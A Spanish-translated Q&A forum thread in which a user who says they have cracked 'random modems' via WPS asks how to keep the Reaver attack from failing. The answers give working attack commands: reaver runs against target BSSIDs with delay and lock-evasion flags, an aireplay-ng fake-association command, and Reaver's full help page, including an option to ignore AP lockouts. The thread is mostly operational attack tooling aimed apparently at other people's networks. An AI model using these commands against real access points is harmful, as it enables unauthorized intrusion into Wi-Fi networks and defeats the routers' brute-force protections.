Reaver solía trabajar con tanta fluidez que no puedo asociarme.

2

Estoy ejecutando Debian lo último con amd64 en un dell inspiron 1564 con un adaptador pci Broadcom BCM4312 parte de la familia B43xx.

También estoy ejecutando la última versión de Reaver, ahora sé que este adaptador que tengo no es compatible con Linux, ya que no se pudo instalar con el disco, me pidió un archivo fw, pero de todos modos lo hice funcionar, puedo navegar por la web .

a mi pregunta, he podido descifrar mis módems aleatorios usando wps. desde que obtuve esta computadora ¡NINGUNO!

lo que sucede es que comienza a asociarse, BAM luego comienza a probar BAM y luego de alrededor del 1% - 4% comenzará a dar FALLO DE ASOCIACIÓN cada minuto, puede hacerlo toda la noche

He probado alrededor de 15 módems diferentes y la misma historia.

¿Hay algún truco para evitar esto, tal vez agregar más comandos para hacer algo que casi garantice el éxito?

Gracias

user1936170
fuente

Respuestas:

3

Rever es una bestia delicada que requiere un cuidado tierno y cariñoso para trabajar. Lo más probable es que lo que esté sucediendo sea que el punto de acceso alcance el número máximo de intentos asignados en un período de tiempo.

Necesitarás ralentizar tu ataque.

Si escribe reaver -h, puede ver una lista de todas las opciones disponibles.

Tendrá que experimentar con estas opciones.

intenta usar

-a (auto detect beset options)  
-d (give a long delay between requests)  
-r (sleep after so many attempts)  
-vv (very verbose, will show everything that is going on. You can then google any error messages you see)  
-x (time to sleep after 10 failures)  

Mi configuración estándar Si esto no funciona, empiezo a agregar marcas como -x o -r.

reaver -i mono0 -c 1 -b <someMacAddress> -vv -a 

Pagina de ayuda

root@kali:/etc/apt# reaver -h

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]
Spuder
fuente
2

Solo haz:

reaver with -N option

No hagas nada usando la -aopción al principio. Intenta también asociarte con Aireplay.

Entonces solo haz esto:

reaver -i wlan0 -b 00:12:34:56:78 -vv -N -S -A

Simultáneamente hacer:

aireplay-ng -1 5 -a 00:12:34:56:78 wlan0 

Si tiene problemas para asociarse con AP, no intente Aireplay-ng con -1 30números más grandes.

usuario534622
fuente
Esta pregunta tiene más de 2 años y tiene una respuesta clara, bien explicada y aceptada. Si bien siempre se aprecian nuevas ideas / enfoques, ¿por qué exactamente esta respuesta es preferible a la respuesta aceptada?
JakeGould